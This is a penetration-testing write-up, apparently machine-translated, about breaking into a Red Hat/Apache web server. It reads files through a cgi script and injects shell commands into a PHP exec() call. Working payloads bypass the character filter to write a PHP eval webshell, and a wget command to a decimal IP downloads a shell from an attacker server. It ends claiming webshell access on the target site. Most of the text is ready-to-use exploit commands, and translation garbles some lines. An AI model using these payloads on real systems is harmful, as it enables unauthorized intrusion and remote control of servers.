2 linux penetration testing skills

1x00 background

If a website is found to have a vulnerability, perform the test:

Is this a cgi script http://xxx.com/cgi-bin/printfile.cgi that gets web source code? File = http://www.baidu.com compiler is habitually tested after file .. /.. /.. /.. /.. /The inclusion or read vulnerability is invalid. what is interesting is that the File protocol (local File Transfer Protocol) is used to successfully read directories and files.

 

The target environment is Red Hat6.5 + Apache. In the next step, flip the sensitive files and find the configuration file collection information to locate the current site path.

0x01 Breakthrough points found

After a period of time, we can see that there is nothing available for the current site. The scripting language of the same server site is mainly cgi perl, a small number of php. the code that can be used in a consistent blanket search, during which many cgi scripts with execution permissions are found and tried to access them in the browser, but internal Error 500 is prompted, in this way, even if the code runs successfully, you cannot know the code running status and can only give up. after a while, I finally found an interesting php script code in the php file of the same server site.

exec('make -i -f skriptit/Makefile DOT_EXEC=bin/ SCRIPTDIR=skriptit/ PICNAME='.$file.' htmlcheck dot2png dot2png_large dot2pdf');

Exec () to execute an external program, as long as the variable $ file in PICNAME = '. $ file.' can be controlled, the system command may be executed. Save the code for local testing.

Code analysis example

 

<Html> 




Is a local test, filtered character:


$file = ereg_replace("\\||\\:|\\.","_",$id); 
 
Here | and. are replaced with _ (lower horizontal) // \ path symbol appears, prompt Not current directory (Not current directory)


 


die('make -i -f skriptit/Makefile DOT\_EXEC=bin/ SCRIPTDIR=skriptit/ PICNAME='.$file.' htmlcheck dot2png dot2png\_large dot2pdf'); 

 
Let's take a look at the output of die printing:

The printed result is displayed.
aaaaa, '`
It is interesting that the statement (semicolon) is successfully executed. The constructor statement is:
http://localhost/test.php?id=aaaa;echo test >aaa
The current directory is successfully written.

Of course, you can also execute the command and write the command execution result to a file for ECHO.
http://localhost/test.php?id=aaaa;id >aaa; 
Note that an additional one is added at the end; (semicolon) truncates unnecessary things.

The next step is to write shell and clarify the ideas:

 

 
  
 
   
 
    
 
 
    
$file = ereg_replace("\\||\\:|\\.","_",$id); 
 
   
 
  

 
| And. are replaced with _ (lower horizontal). If the '// \' path symbol appears, the prompt is Not current directory (Not the current directory), which is required for shell writing. (point) Add a suffix. if you write a file directly
http://localhost/test.php?id=aaaa;echo <?php eval($_REQUEST[v]);?> >zzz.php
The obtained file name is zzz_php, which cannot be escaped.

Friends may say, mom, isn't it possible to download files? Write code like this
http://localhost/test.php?id=aaaa;wget www.ccav.com/shell.php
The result is:
Not current directory
Because it contains the. (point) and path symbols.
0x02 Bypass Mode



So we have to consider how to bypass filtering and use two methods to get shell.
1. How to Write shell by echo 2. How to download shell
Method 1:
How to use echo to write shell, Taking writing a PHP Trojan as an example, the main solution is. (point) problem, $ (dollar sign), and> (pipe sign) and parentheses. the method I use here is"
The complete echo statement is as follows:

 

 
  
 
   
 
    
 
 
    
echo <?php eval($_REQUEST[v]);?> >test.php
 
   
 
  

 
Since it cannot be generated, you can borrow the characters in the existing file directly. You can borrow from the variable or from the existing file. The method used is the linux Shell expr method.
For example, if you print the six characters in the first line of the test. php file, you need to borrow all the characters from the file. (The sample test. php is the vulnerability file itself)

The next step is to be physically active. We need to borrow all filtered characters from a Trojan horse in sequence. note that the interval between characters to be read does not seem to contain spaces; otherwise, expr will determine the number of columns is incorrect.
root@Google:/var/www# echo `expr substr $(awk NR==20 test.php) 5 1`
"
    root@Google:/var/www# echo `expr substr $(awk NR==20 test.php) 1 1`
$
root@Google:/var/www# echo `expr substr $(awk NR==1 test.php) 1 1`
<
root@Google:/var/www# echo `expr substr $(awk NR==1 test.php) 6 1`>root@Google:/var/www# expr substr $(awk NR==11 test.php) 35 1
    )
    root@Google:/var/www# expr substr $(awk NR==11 test.php) 33 1
    (
root@Google:/var/www# expr substr $(awk NR==20 test.php) 7 1
    ;
root@Google:/var/www# expr substr $(awk NR==17 test.php) 2 1
    ?
The complete statement is:
echo `expr substr $(awk NR==1 test.php) 1 1`?php eval`expr substr $(awk NR==11 test.php) 33 1``expr substr $(awk NR==20 test.php) 1 1`_REQUEST[v]`expr substr $(awk NR==11 test.php) 35 1``expr substr $(awk NR==20 test.php) 7 1``expr substr $(awk NR==17 test.php) 2 1``expr substr $(awk NR==1 test.php) 6 1` >2`expr substr $(awk NR==30 test.php) 13 1`php  
Successfully executed in shell

Now I can get shell right away. In a short time, I will be promoted to raise my salary. I will become the general manager, become the CEO, marry Bai fumei, and embark on the peak of my life. Think about the excitement ~~

How can I do this ...... the results of execution in the test environment were never expected to exist in the end. (point), because read test. PHP file, still need to carry suffix. your sister .....

Back to the point issue. this time, the direct ls> xxx writes all the files in the current directory (the directory file has a suffix) to xxx, and then borrows from xxx. (point) to replace the original statement.
http://localhost/test.php?id=aaaa;ls >xxx;
Taking my local environment as an example, the character of the 1st rows and 2nd columns (2.php) In the xxx file is. (point)

Replace the. (point) of test. php In the original statement
`expr substr $(awk NR==1 xxx)  2 1`
Original statement:
echo `expr substr $(awk NR==1 test.php) 1 1`?php eval`expr substr $(awk NR==11 test.php) 33 1``expr substr $(awk NR==20 test.php) 1 1`_REQUEST[v]`expr substr $(awk NR==11 test.php) 35 1``expr substr $(awk NR==20 test.php) 7 1``expr substr $(awk NR==17 test.php) 2 1``expr substr $(awk NR==1 test.php) 6 1` >2`expr substr $(awk NR==30 test.php) 13 1`php
Changed:
echo `expr substr $(awk NR==1 test`expr substr $(awk NR==1 xxx)  2 1`php) 1 1`?php eval`expr substr $(awk NR==11 test`expr substr $(awk NR==1 xxx)  2 1`php) 33 1``expr substr $(awk NR==20 test`expr substr $(awk NR==1 xxx)  2 1`php) 1 1`_REQUEST[v]`expr substr $(awk NR==11 test`expr substr $(awk NR==1 xxx)  2 1`php) 35 1``expr substr $(awk NR==20 test`expr substr $(awk NR==1 xxx)  2 1`php) 7 1``expr substr $(awk NR==17 test`expr substr $(awk NR==1 xxx)  2 1`php) 2 1``expr substr $(awk NR==1 test`expr substr $(awk NR==1 xxx)  2 1`php) 6 1` >2`expr substr $(awk NR==30 test`expr substr $(awk NR==1 xxx)  2 1`php) 13 1`php
A syntax error occurred during execution.

In another way, the cat test. php> xxoo was used to solve the problem. However, test_php is used as a filter, and the point can only be borrowed from xxx first.
Statement:
cat test`expr substr $(awk NR==2 xxx) 6 1`php >xxoo
In this way, you can write test. php to the xxoo file.
Finally, change test. php to xxoo to solve the point restriction.
Original statement:
echo `expr substr $(awk NR==1 test.php) 1 1`?php eval`expr substr $(awk NR==11 test.php) 33 1``expr substr $(awk NR==20 test.php) 1 1`_REQUEST[v]`expr substr $(awk NR==11 test.php) 35 1``expr substr $(awk NR==20 test.php) 7 1``expr substr $(awk NR==17 test.php) 2 1``expr substr $(awk NR==1 test.php) 6 1` >2`expr substr $(awk NR==30 test.php) 13 1`php
After modification:
echo `expr substr $(awk NR==1 xxoo) 1 1`?php eval`expr substr $(awk NR==11 xxoo) 33 1``expr substr $(awk NR==20 xxoo) 1 1`_REQUEST[v]`expr substr $(awk NR==11 xxoo) 35 1``expr substr $(awk NR==20 xxoo) 7 1``expr substr $(awk NR==17 xxoo) 2 1``expr substr $(awk NR==1 xxoo) 6 1` >2`expr substr $(awk NR==30 xxoo) 13 1`php
The test environment is successfully executed:
http://localhost/test.php?id=anything;echo `expr substr $(awk NR==1 xxoo) 1 1`?php eval`expr substr $(awk NR==11 xxoo) 33 1``expr substr $(awk NR==20 xxoo) 1 1`_REQUEST[v]`expr substr $(awk NR==11 xxoo) 35 1``expr substr $(awk NR==20 xxoo) 7 1``expr substr $(awk NR==17 xxoo) 2 1``expr substr $(awk NR==1 xxoo) 6 1` >2`expr substr $(awk NR==30 xxoo) 13 1`php;

Finally, the complete php sentence Trojan is successfully written. The target webshell permission is obtained.
Summary steps: 1) Explain)
Ls> xxx, cat xxx // first find the vertex to obtain the number of rows and columns.
2)
Cat test. 'expr substr $ (awk NR = 1 xxx) 2 1 'php> xxoo // write test. php to the xxoo file for later reading.
3)
Echo 'expr substr $ (awk NR = 1 xxoo) 1 1 '? Php eval 'expr substr $ (awk NR = 11 xxoo) 33 1' expr substr $ (awk NR = 20 xxoo) 1 '_ REQUEST [v] 'expr substr $ (awk NR = 11 xxoo) 35 1' expr substr $ (awk NR = 20 xxoo) 7 1 ''' expr substr $ (awk NR = 17 xxoo) 2 1' expr substr $ (awk NR = 1 xxoo) 6 1'> 2' expr substr $ (awk NR = 30 xxoo) 13 1' php; // Replace the required characters with the characters in the xxoo file.
Method 2:
You can get the shell by downloading the file. This method saves a lot of trouble. The key to solving this problem is. (point), and // (path character ). you can use a digital IP address to solve the problem.
Prerequisites:
The webserver that can be accessed by an ip address on the internet, And the wget program and the current directory of the target have the permission to write files.
Online conversion link:
http://tool.chinaz.com/ip/?IP=127.0.0.1

Take the local machine as an example (ubuntu + apache2 :)
1. convert the ip address to 127.0.0.1 = 2130706433 2. remove the php parsing of the internet server. In the apache configuration file, comment the following parameter # LoadModule php5_module/usr/lib/apache2/modules/libphp5.so 3.create the index.html file in the root directory, the content is '<a href = "shell. php "> test </a> 'to create a shell. php content is Ma. 4. use the wget download feature to download the entire site (wget automatically points to the shell along the href. php and download) Ps: It seems that you can use 301 to redirect, But I didn't test it.
Parameter: wget-r 2130706433
The result is as follows: after downloading the file, save it as a directory structure to get the shell.
0x03 Last
 

You are welcome to correct the error or missing content. In this article, we hope you can share some methods to write shell by bypassing character filtering in linux shell,
Finally, I would like to thank Brother Yue for his guidance.